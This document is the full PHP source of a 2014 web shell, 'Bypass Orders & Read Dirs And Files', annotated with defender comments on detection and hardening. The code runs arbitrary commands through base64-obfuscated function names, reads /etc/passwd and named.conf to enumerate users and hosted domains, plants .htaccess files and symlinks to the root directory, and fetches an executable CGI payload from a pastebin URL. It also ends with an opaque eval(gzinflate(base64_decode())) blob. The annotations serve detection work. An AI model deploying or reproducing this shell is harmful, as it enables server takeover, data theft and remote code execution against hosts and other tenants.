
Bypass Orders & Read Dirs And Files v1.0

Author: jsass , Published: 24-06-2014
<html>
<head>
<center><title>Q8 GRAYHAT TEAM</title>
<body>
<H1 style="color: #123456; text-shadow: 0px 0px 1px #123456";text-align: center;> Bypass <s>Orders & Read </s> Dirs And Files v1.0</H1>
<PRE>



<?php

# Coded by jsass 
# Functions Bypass And many Another ways 
# Twitter : KwSecurity
# Q8 GRAYHAT TEAM

// Defender note: removing the execution time limit and silencing all error
// reporting at the top of a script is a common web-shell preamble. Combined
// with the "@" suppression used throughout, failures leave little trace in
// PHP error logs, so detection has to rely on file-integrity monitoring,
// request-body inspection and process/network telemetry instead.
@set_time_limit(0);
 
error_reporting(0);


// Operator UI. No access check (password, IP allow-list, session) is visible
// in this listing before the form is emitted or before the handlers run.
// The POST field names below (cmd, cmx, cf, cff, switch, string, website,
// file, start, Bypass, bypass) and the fixed option values are stable strings
// that WAF / request-body audit rules can match on.
echo 
"<form method='POST' />
<input type='text'  name='cmd' size='22' /><input type='submit' name='cmx'  value='COMMAND' />
<form method='POST' />
<input type='text'  name='cf' size='60' /><br>
<input type='text'  name='cff' size='60' /><br>
<input type='submit'  value='Copy & Symlink' /><br>
<select name='switch'>
<option selected='selected' value='file'>View file</option><option value='dir'>View dir</option><input type='text' size='60' name='string'><input type='submit' value='go'>
</select>

<form method='POST' /> 
<select name='website'>
<option value='show_source'>show_source</option>
<option value='highlight_file'>highlight_file</option>
<option value='readfile'>readfile</option>
<option value='include'>include</option>
<option value='require'>require</option>
<option value='file'>file</option>
<option value='fread'>fread</option>
<option value='file_get_contents'>file_get_contents</option>
<option value='fgets'>fgets</option>
<option value='curl'>curl</option>
<input type='test' name='file' size='22' /><input type='submit' name='start'   value='READ FILES' />
</select>

<form method='POST' /> 
<select name='Bypass'>
<option value='passwd' >passwd</option>
<option value='users' >users</option>
<option value='Domain' >Domain</option>
<option value='htaccess' >htaccess</option>
<option value='Great_Cgi'>Great_Cgi</option>
<input type='submit' name='bypass'   value='bypass'></form>
</select>"
;

   /**
    * Tries to run $cmd through one of several PHP process-execution
    * functions and hand back whatever output was captured in $comand.
    *
    * Defender notes:
    *  - The callee names are never written literally. They are stored as
    *    base64 strings that are decoded and reversed at run time (the inline
    *    comments give the decoded names) and then used as variable functions.
    *    Keyword scanning for literal "system(" / "exec(" will not match;
    *    signatures should instead flag strrev()/base64_decode() output used
    *    as a callee, nested base64_decode() chains, and "@"-suppressed calls.
    *  - The function_exists() probes use the literal names, so those strings
    *    are still present in the file and remain usable as a static indicator.
    *  - Hardening: list the process-execution functions in php.ini
    *    disable_functions where the application does not need them, and alert
    *    on any PHP worker process spawning a shell.
    *
    * @param string $cmd Command line; the caller takes it from POST field "cmd".
    * @return string Captured output, possibly empty.
    */
   function 
Command_execution($cmd)
    {  
//  Hmza Bypass Functions by strrev(base64_decode)

  
// Obfuscated callee names; see the trailing comment on each line.
$sys strrev(base64_decode("bWV0U3lT"));//system 
  
$pas strrev(base64_decode("dXJodHNzYXA="));//passthru
  
$exe strrev(base64_decode("Y2V4ZQ=="));//exec 
  
$she strrev(base64_decode("Y2V4ZV9sbGVocw=="));//shell_exec 
  
$pop strrev(base64_decode("bmVwb3A="));//popen


  
$comand '';

// First function that exists wins; output is collected via output buffering.
  if (
function_exists('system')) { @ob_start();  @$sys($cmd);  $comand = @ob_get_contents();  @ob_end_clean();  }

  elseif (
function_exists('passthru')) {  @ob_start(); @$pas($cmd);   $comand = @ob_get_contents(); @ob_end_clean();  } 
  
  elseif (
function_exists('exec')) {  @$exe($cmd,$res);  $comand join("\n",$comand);  } 
    
  elseif (
function_exists('shell_exec')) {  @ob_start();  @$she($cmd);  $comand = @ob_get_contents();   @ob_end_clean(); } 
   
  elseif(
function_exists('popen')) {  $popen = @$pop($cmnd,"r");  }

    if ( 
is_resource($popen) ) {
    while ( !
feof($popen) ) { $comand .= fread($popen2096);  }
    
pclose($popen);
    } else { 
// Fallback path: reads POST field "site", which the HTML form in this file
// does not define, and decodes the string "eval" from four nested base64
// layers (per the inline comment). Deeply nested base64_decode() calls are
// a strong static indicator on their own.
$z = array($sys,$pass,$exe,$she,$pop);
    foreach(
$z as $zz) {
    
$eval strrev(base64_decode(base64_decode(base64_decode(base64_decode('V1d0a1IwMXNjRkpRVkRBOQ==')))));//eval
    
$sy $zz ($_POST['site']);
    
$eval.$sy;
    break;}}
    return 
$comand;
}


/**
 * Second-chance command runner: feeds the same five decoded function names
 * to a series of PHP callback mechanisms instead of calling them directly.
 *
 * Mechanisms referenced in the body: call_user_func(), ReflectionFunction
 * ::invoke(), call_user_func_array(), register_tick_function(), array_map(),
 * array_walk() and array_filter().
 *
 * Defender notes:
 *  - NOTE(review): the name suggests the author was targeting hosts running
 *    the Suhosin hardening extension; nothing in the body confirms which
 *    restriction each mechanism is meant to get around.
 *  - Static detection should treat any of the callback APIs above as
 *    suspicious when the callable argument is a computed string rather than
 *    a literal or a closure.
 *  - php.ini disable_functions removes the target function itself, so it
 *    applies no matter which callback API is used to reach it.
 *
 * @param string $cmd Command line passed through from the caller.
 * @return void The function ends with a bare "return;".
 */
function 
suhosin($cmd){
$sys strrev(base64_decode("bWV0U3lT"));//system 
$pas strrev(base64_decode("dXJodHNzYXA="));//passthru
$exe strrev(base64_decode("Y2V4ZQ=="));//exec 
$she strrev(base64_decode("Y2V4ZV9sbGVocw=="));//shell_exec 
$pop strrev(base64_decode("bmVwb3A="));//popen

$arcall = array($sys,$pas,$exe,$she,$pop);
// One callback mechanism per line below; each receives the decoded name.
foreach(
$arcall as $call) { 
$func call_user_func($call,$cmd); break;
if(!
$func$function = new ReflectionFunction($call); $function->invoke($cmd); break;
if(!
$function$calluser call_user_func_array($call, array($cmd)); break;
if(!
$calluser) declare(ticks=1); $register register_tick_function($call$cmd); unregister_tick_function($call); break;
if(!
$register$map array_map($call, array($cmd)); break;
if(!
$map$a = array($cmd); $walk array_walk($a,$call); break;
if(!
$walk$bfilter = array($cmd); $filter array_filter($bfilter$call); break;
}
return;
}


# Coded by برق الشمال
/**
 * Third-chance command runner: assembles a function name one character at a
 * time from two alphabet arrays and calls it with $cmd.
 *
 * Defender notes:
 *  - The indices used (18, 24, 18, 19, 4, 12) spell the name in mixed case.
 *    PHP resolves function names case-insensitively, so signature matching
 *    must be case-insensitive and should not depend on the name appearing as
 *    one contiguous literal.
 *  - A large single-letter array followed by indexed concatenation that is
 *    then used as a callee is a reusable static indicator.
 *
 * @param string $cmd Command line passed through from the caller.
 * @return mixed Whatever the assembled function returns ($v).
 */
function ssys($cmd){
$s = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
$C = array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z');
// Name is built from array elements only; no readable keyword appears here.
$sy =  $C[18].$C[24].$C[18].$s[19].$C[4].$s[12];
$v $sy($cmd);
return 
$v;
break;
}

/**
 * Copies a file to a caller-chosen path, falling back to a symlink when the
 * copy fails, and echoes the destination path.
 *
 * Both paths come straight from POST ("cf" = source, "cff" = destination)
 * with no validation, and the destination's parent directory is created
 * with mode 0777.
 *
 * Defender notes:
 *  - The symlink fallback matters on shared hosting: a link placed inside
 *    the web root can expose another account's files through the web server
 *    if it follows symlinks. Apache's "Options SymLinksIfOwnerMatch" (or no
 *    FollowSymLinks at all), open_basedir and per-site OS users limit this.
 *  - Indicators: new world-writable directories under the document root and
 *    symlinks whose target lies outside the owning site's tree.
 *
 * @return void
 */
function 
copsy(){
  
$cf $_POST['cf'];
  
$cff $_POST['cff'];
  
// 0777: the created directory tree is writable by every local user.
mkdir(dirname($cff), 0777true);
  if (
copy($cf$cff)) { echo "$cff";
  }else{@
symlink($cf$cff);   echo "$cff"; } return;
}

## READ FILES

/**
 * Outputs the contents of $file using whichever PHP API the operator picked
 * in the "website" POST field.
 *
 * Offered APIs: show_source, highlight_file, readfile, include, require,
 * file, fread, file_get_contents, fgets and a cURL request using a file:
 * URL. Offering many equivalents is a way to keep working when only some of
 * them are listed in disable_functions.
 *
 * Defender notes:
 *  - "include" and "require" are language constructs, not functions: they
 *    cannot be turned off with disable_functions, and they execute any PHP
 *    found in the target rather than merely printing it.
 *  - Path-level controls (open_basedir, filesystem permissions, per-site OS
 *    users) cover every variant here, whereas function blacklists cover only
 *    the ones that happen to be listed.
 *  - Every call is "@"-suppressed, so failed attempts will not appear in the
 *    PHP error log.
 *
 * @param string $file Path supplied by the caller from POST field "file".
 * @return void Output is written directly to the response.
 */
function readfils($file) {

    
$web $_POST['website'];

    switch (
$web)
    {
        case 
'show_source'$show =  @show_source($file);  break;

        case 
'highlight_file'$highlight = @highlight_file($file); break;

        case 
'readfile'$readfile = @readfile($file);  break;

        // include/require: the target is parsed and run as PHP.
        case 
'include'$include = @include($file); break;

        case 
'require'$require = @require($file);  break;

        case 
'file'$file =  @file($file);  foreach ($file as $key => $value) {  print $value; }  break;

        // Reads at most 90000 bytes.
        case 
'fread'$fopen = @fopen($file,"r") or die("Unable to open file!"); $fread = @fread($fopen,90000); fclose($fopen); print_r($fread); break;

        case 
'file_get_contents'$file_get_contents =  @file_get_contents($file); print_r($file_get_contents);  break;

        case 
'fgets'$fgets = @fopen($file,"r") or die("Unable to open file!"); while(!feof($fgets)) { echo fgets($fgets); } fclose($fgets); break;
        
        // Local file access routed through libcurl's file: scheme.
        case 
'curl' $ch curl_init(); curl_setopt($chCURLOPT_URL"file:file:///".$file); curl_setopt($chCURLOPT_HEADER0); $curl curl_exec($ch); curl_close($ch); echo $curl;


        default: 
        echo 
"{$web} Not There"
      } 
      }
/**
 * Reads a file or lists a directory by going through PHP's IMAP extension
 * instead of the normal filesystem functions.
 *
 * POST "switch" selects the mode ("file" or "dir") and POST "string" carries
 * the target. In "file" mode the target is passed to imap_open() as the
 * mailbox and imap_body() output is printed. In "dir" mode a stream is
 * opened on "/etc/passwd" and imap_list() is called with the target, which
 * may be given as "reference|pattern".
 *
 * Defender notes:
 *  - NOTE(review): this presumably relies on the IMAP client library doing
 *    its own local file access, outside PHP-level path restrictions such as
 *    open_basedir; confirm against the PHP build in use.
 *  - Do not load the imap extension on hosts that have no mail-access need,
 *    and treat imap_open() with a local filesystem path as the mailbox
 *    argument as a high-confidence indicator in code review and scanning.
 *
 * @return void Output is written directly to the response.
 */
function 
red(){
  
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

// Mode "file": the POSTed string is used as the mailbox name.
if (
$string && $switch == "file") {
$stream imap_open($string"""");
if (
$stream == FALSE)
die(
"Can't open imap stream");

$str imap_body($stream1);
if (!empty(
$str))
echo 
"<pre>".$str."</pre>";
imap_close($stream);
// Mode "dir": fixed local path as the mailbox, POSTed string drives imap_list().
} elseif (
$string && $switch == "dir") {
$stream imap_open("/etc/passwd""""");
if (
$stream == FALSE)
die(
"Can't open imap stream");

$string explode("|",$string);
if (
count($string) > 1)
$dir_list imap_list($streamtrim($string[0]), trim($string[1]));
else
$dir_list imap_list($streamtrim($string[0]), "*");
echo 
"<pre>";
for (
$i 0$i count($dir_list); $i++)
echo 
"$dir_list[$i]\n";
echo 
"</pre>";
imap_close($stream);
}
}

/**
 * Prints the local account database, first via cURL with a file: URL for
 * /etc/passwd and, when that yields nothing, by asking posix_getpwuid() for
 * every UID from 0 to 59999 and echoing each returned field.
 *
 * Defender notes:
 *  - The fallback needs no file read at all, so open_basedir does not stop
 *    it; adding the posix_* functions to disable_functions (where the
 *    application does not use them) does.
 *  - On shared hosting the account list maps directly to other tenants'
 *    home directories, which is why it is gathered first. Per-site OS users
 *    with non-traversable home directories reduce what the list is worth.
 *  - Indicator: a tight loop over a wide integer range calling
 *    posix_getpwuid().
 *
 * @return void Output is written directly to the response.
 */
function 
passwd(){
$ch curl_init();
curl_setopt($chCURLOPT_URL"file:file:///etc/passwd");
curl_setopt($chCURLOPT_HEADER0);
$curl curl_exec($ch);
curl_close($ch);
echo 
$curl;

// Fallback when the cURL read returned nothing: enumerate by UID.
   if(!
$curl){
   for(
$uid=0;$uid<60000;$uid++){   //cat /etc/passwd
   
$ara posix_getpwuid($uid);
   if (!empty(
$ara)) {
   while (list (
$key$val) = each($ara)){
   echo  
"$val:";
   } } }

   return;
  }
}


/**
 * Prints the login names found in /etc/passwd (the first colon-separated
 * field of each line), reading the file through a list of interchangeable
 * PHP file APIs held as strings and called as variable functions.
 *
 * Defender notes:
 *  - The array of file-function names invoked via "$a(...)" is the same
 *    evasion pattern used elsewhere in this file; flag string arrays of
 *    sensitive function names that are iterated and called.
 *  - $xx and $r are read near the end but are not assigned anywhere in this
 *    function.
 *
 * @return void Output is written directly to the response.
 */
function 
users(){
$ar = array("file_get_contents","file","readfile","include","require","show_source","highlight_file");
foreach(
$ar as $a){
$u explode("\n"$a("/etc/passwd"));
foreach (
$u as $us) {
// Keep only the account name (field 0) from each passwd line.
$us explode (":"$us); 
print 
strip_tags($us[0]."\n"); }
if(!
$xx) : print_r($r."\n"); endif;
break;
}
}

/**
 * Lists the domains hosted on the machine by reading the BIND configuration
 * at /etc/named.conf and extracting every name matching "named/<name>.db".
 *
 * The first attempt uses the same string-array-of-file-functions pattern as
 * users(); the second opens the file with fopen()/fread() (up to 90000
 * bytes) when $file was never set.
 *
 * Defender notes:
 *  - This is reconnaissance: it tells the operator which other sites share
 *    the host. /etc/named.conf should not be readable by the web server
 *    account; restricting it to root and the DNS daemon's group removes the
 *    data source.
 *  - Indicators: web-server-owned processes opening /etc/named.conf, and the
 *    regex literal "#named/(.*?).db#" in PHP files.
 *
 * @return void Output is written directly to the response.
 */
function 
Domain(){
 
$ar = array("file_get_contents","file","readfile","include","require","show_source","highlight_file");
 foreach(
$ar as $a){
 
$file = @$a("/etc/named.conf");
 
preg_match_all("#named/(.*?).db#",$file ,$r);
 
$domains array_unique($r[1]);
 
$count count($domains);
 echo 
"Domains In Server is  :  ".$count;
 foreach(
$domains as $domain) { 
 print 
"\n$domain\n";  }break;}

// Second attempt through fopen()/fread() when nothing was read above.
  if(!isset(
$file)) {
 
$fopen = @fopen("/etc/named.conf","r") or die("Unable to open file!");
 
$fread = @fread($fopen,90000);
 
preg_match_all("#named/(.*?).db#",$fread ,$r); 
 
$domains array_unique($r[1]);
 
$count count($domains);
 echo 
"<p>Domains In Server is  :  ".$count."</p>";
 echo 
"<hr>";
 foreach(
$domains as $domain) {
 
fclose($fopen); 
 echo 
"<br>$domain<br>"; }}}


# GREAT 8
/**
 * Creates nine directories (secQ81 .. secQ89), writes a different .htaccess
 * into each, and then runs a shell command in each directory that creates a
 * symlink named 1.txt pointing at the filesystem root.
 *
 * Each .htaccess variant tries a different mix of Options, DirectoryIndex,
 * AddType, AddHandler, RemoveHandler and ForceType directives so that .php
 * (and in some variants .html, .conf, .sql, .log) files are served as plain
 * text or a download instead of being executed, with directory indexes and
 * symlink following switched on.
 *
 * Defender notes:
 *  - The whole technique depends on the server honouring per-directory
 *    overrides. Setting "AllowOverride None" (or a narrow AllowOverride
 *    list that excludes Options and FileInfo) in the main Apache
 *    configuration, and using "Options SymLinksIfOwnerMatch" rather than
 *    FollowSymLinks, neutralises all nine variants.
 *  - Indicators: directories named secQ8<digit> under a document root; new
 *    .htaccess files that remap the .php handler or MIME type; a symlink in
 *    the web root whose target is "/"; the PHP worker spawning "ln -s".
 *  - File-integrity monitoring on .htaccess creation and change is the most
 *    direct detection.
 *
 * @return void Progress messages are written directly to the response.
 */
function htaccess(){
# This Code by c99.php
// Directory name => .htaccess body to drop inside it.
$map = array 
(
    
"secQ81" => "Options Indexes FollowSymLinks\nDirectoryIndex ssssss.htm\nAddType txt .php\nAddHandler txt .php\nAddType txt .html\nAddHandler txt .html\nOptions all\nOptions\nAllow from all\nRequire None\nSatisfy Any",
    
"secQ82" => "Options +FollowSymLinks\nDirectoryIndex seees.html\nRemoveHandler .php\nAddType application/octet-stream .php\n",
    
"secQ83" => "Options +FollowSymLinks\nDirectoryIndex Index.html\nOptions +Indexes\nAddType text/plain .php\nAddHandler server-parsed .php",
    
"secQ84" => "Options Indexes FollowSymLinks\nDirectoryIndex ssssss.htm\nAddType txt .php\nAddHandler txt .php",
    
"secQ85" => "Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html",
    
"secQ86" => "Options +FollowSymLinks\nDirectoryIndex Sux.html\nOptions +Indexes\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html",
    
"secQ87" => "Options Indexes FollowSymLinks\nAddType text/plain .php .inc .asp .php3\nOptions All\nOptions All",
    
"secQ88" => "Options all DirectoryIndex Sux.html AddType textplain .php AddType textplain .conf AddType textplain .sql AddType textplain .log AddHandler server-parsed .php AddHandler txt .html Require None Satisfy Any",
    
"secQ89" => "<Files *.php> ForceType application/x-httpd-php4</Files>"
);

foreach (
$map as $dir => $htaccess)
{
  
mkdir ($dir0755);
  
// Opened in append mode, so repeated runs keep adding to the same file.
$file fopen ("$dir/.htaccess""a") or die("Unable to open file!");
  if (
fwrite ($file$htaccess)) 
  echo 
" Dir And File Created Succes ! - - ->".$dir."\n";
  else echo 
"WARNING";
  if(
file_exists($dir)){
  
chdir($dir);
  
// Literal system() call: unlike the obfuscated callers in this file, this
// one is visible to plain keyword scanning.
system('ln -s / 1.txt');
  
chdir('../');
  }else{ echo 
"error";}}}

/**
 * Stages a second-stage CGI script: creates a "cgi" directory (mode 0777),
 * writes an .htaccess there that enables ExecCGI and maps the ".Q8"
 * extension to the cgi-script handler, downloads a remote file from a
 * pastebin.com raw URL over plain HTTP, saves it as cgi/js.Q8 and sets it
 * to mode 0755.
 *
 * Defender notes:
 *  - The downloaded content is not shown on this page; treat cgi/js.Q8 as
 *    unknown attacker-controlled code. The pastebin URL in the body is a
 *    network indicator for proxy/DNS log searches.
 *  - A CGI handler runs outside the PHP interpreter, so PHP-level controls
 *    (disable_functions, open_basedir) do not apply to what it executes.
 *    "AllowOverride None", or an AllowOverride list without Options and
 *    FileInfo, prevents the .htaccess from taking effect.
 *  - Remote fetch through file_get_contents() requires allow_url_fopen;
 *    turning it off where the application does not need it blocks this
 *    download path. Egress filtering from web servers to paste sites is the
 *    network-side equivalent.
 *  - Indicators: a world-writable "cgi" directory in the web root, an
 *    .htaccess containing "AddHandler cgi-script" for an unusual extension,
 *    executable files with the ".Q8" extension.
 *
 * @return void Status messages are written directly to the response.
 */
function 
Great_Cgi(){
  if(
function_exists('file_get_contents')){
  
mkdir("cgi"0777);
  
chdir('cgi');
  
$htazx  fopen(".htaccess""w") or die("Unable to open file!");
  
// Per-directory override that turns ".Q8" files into executable CGI.
$fhtazx fwrite($htazx,"Options FollowSymLinks MultiViews Indexes ExecCGI 
    AddType application/x-httpd-cgi .Q8 
    AddHandler cgi-script .Q8 
    AddHandler cgi-script .Q8"
);
  
fclose($htazx);
  
$fx     fopen("js.Q8""w") or die("Unable to open file!");
  
// Second-stage download; content is unauthenticated and fetched over HTTP.
$fgc    file_get_contents('http://pastebin.com/raw.php?i=CdZNmMut'); 
  
$fwr    fwrite($fx$fgc);
  
fclose($fx);
 
$chmchmod("js.Q8" 0755); 
  if(
$chm == true){
        echo 
"Created Succes ! and chmoded the file to 755 - - ->  cgi/js.Q8"; } chdir('../');}
  else{ echo 
"sorry file didn't chmoded"; }

}


############################## RUN FUNCTIONS ##############################

// Request dispatcher. Everything below runs on each request to the script;
// results are printed inside a <textarea>. No authentication step is visible
// before any handler is reached.
echo "<textarea rows='10' cols='80' />";

// Command path, gated on POST "cmx": Command_execution() first, then
// suhosin(), then ssys() as successive fallbacks.
if(
$_POST['cmx']){
$cmd trim($_POST['cmd']);
$coman Command_execution($cmd);  
if(!
$coman)  $susu suhosin($cmd);  
if(!
$susussys($cmd);  
}

// copsy() and red() are called unconditionally; each reads its own POST
// fields internally.
copsy();


red();


// File-read path, gated on POST "start".
$file trim($_POST['file']);
if(
$_POST['start'])
     {
 
readfils($file); }


// Recon / staging actions, selected by POST "Bypass" when "bypass" is set.
    if(isset(
$_POST['bypass'])) {
    switch (
$_POST['Bypass']) {
    case 
'passwd': print   passwd();      break;
    case 
'htaccess':       htaccess();    break;
    case 
'users':          users();       break;
    case 
'Domain':         Domain();      break;
    case 
'Great_Cgi':      Great_Cgi();   break;

    default:
      }
}

echo 
"</textarea>";

// NOTE(review): opaque payload. The blob below is base64-decoded, inflated
// and passed to eval() on every request, independent of any POST field. Its
// content is not visible on this page and has not been decoded here, so its
// behaviour is unknown. Publicly shared shells often hide extra code from
// the person deploying them in blobs like this (verify by decoding offline
// in an isolated analysis environment, without executing it).
// eval(gzinflate(base64_decode(...))) is itself a high-confidence static
// indicator for scanners and code review.
eval(
gzinflate(base64_decode('bVFPa4MwFD+v0O/wDIUobO0uO9XoeujKWGED15OIRI0YMCZoMujGvvuiaUthhQRe3u/f4yWOwlg1aj5jZSMBh0UUFv108dL2c9NRwfxgiaf2qojw+sKtZS+AlprLjiAEgulGVgQpOWgErCv1UTGChGk1V7TXq5H/UFFNEYyuBBnVSlqxHgGvrl7XGbxTRoNzqnnLzlJXD/zb1k+PKDoRHZhbK3QSDaYQXLsE1/+irbHAYYqzymmuKZPXPizyj/fkM8UjF2dACJyZEMDPfHZnSc+lVEd/kb+87rdJisdZcJZiLVQ+DoCze/gHOiCwHnBZtTOG5PCWbBPwPG9c8GX/a/i1cawd2A3NbrPb7G9L7Intr/4B')));

?>

<br>
<font color="#123456" size="3"><b> [ :: Copyright &copy 2014 - <font color="red"> by jsass </a> Q8 GRAYHAT Team</a> :: ] </b></font></font>
<br>
</PRE></CENTER></body>
</html>
